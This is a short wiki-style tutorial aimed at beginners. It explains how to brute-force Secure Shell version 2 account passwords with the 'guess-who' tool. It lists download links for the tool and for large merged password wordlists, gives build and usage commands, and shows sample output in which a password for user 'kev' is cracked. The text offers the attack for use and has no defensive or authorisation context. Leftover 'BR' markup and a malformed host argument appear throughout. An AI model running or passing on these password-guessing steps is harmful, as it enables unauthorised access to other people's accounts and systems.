Brute Force ssh (for n00bs)
Guess-who is a password brute force utility for attacking Secure Shell Version 2 accounts. BR It is available from http://packetstormsecurity.org/ BR
Required Files and programs
It is NOT required to download ALL files here. Please read CAREFULLY! BR
Choose 1 from the following: BR
[http://www.ac3bf1.org/files/sec/all_merged.tar.gz all_merged.tar.gz]
[http://www.ac3bf1.org/files/sec/all_merged.zip all_merged.zip]
(~20MB! - 67MB uncompressed)
- Several passwords
[http://www.ac3bf1.org/files/sec/common_merged.tar.gz common_merged.tar.gz]
[http://www.ac3bf1.org/files/sec/common_merged.zip common_merged.zip]
(~6.5MB - 18MB uncompressed)
- Selection of common passwords
Required Program: BR
[http://www.ac3bf1.org/files/sec/guess-who-0.44.tgz guess-who-0.44.tgz] (16.1 KB) - Linux program to Brute Force SSH BR
In case you would want to personalize your password files, the folowing is a Wind0ws utility to merge text files BR
[http://www.ac3bf1.org/files/sec/uumerge.zip uumerge.zip] (55.1 KB) Wind0ws merging program BR
- The following are to be chosen if you want to create personalized password files.
[http://www.ac3bf1.org/files/sec/common.tar.gz common.tar.gz] | [http://www.ac3bf1.org/files/sec/common.zip common.zip] (35 files - 6322.2 KB) - Several passwords not merged (~6MB) BR [http://www.ac3bf1.org/files/sec/all.tar.gz all.tar.gz] | [http://www.ac3bf1.org/files/sec/all.zip all.zip] (46 files - 19130.5 KB) - Selection of common passwords not merged (~20MB!) BR
Procedure
Installation: BR Download to the desired directory BR
tar -zxvf guess-who-0.44.tgz make
[root@hacker guess-who]# ./b guess-who SSH2 parallel passwd bruter (C) 2002 by krahmer@cs.uni-potsdam.de Usage: ./b <-l login> <-h host> [-p port] <-1|-2> [-N nthreads] [-n ntries] Use -1 for producer/consumer thread model, -2 for dumb parallelism. < Password file
Expected output: BR
[root@hacker guess-who]# ./b -l kev -h l192.168.1.1 -p 22 -2 < /passwords.txt (!)056 ][ 00013 ][ 00000004.307361 ][ kev ][ arsenal ] [ 00061 ][ 00015 ][ 00000004.066396 ][ kev ][ e3d ]
As you can see the user kev has a password of arsenal BR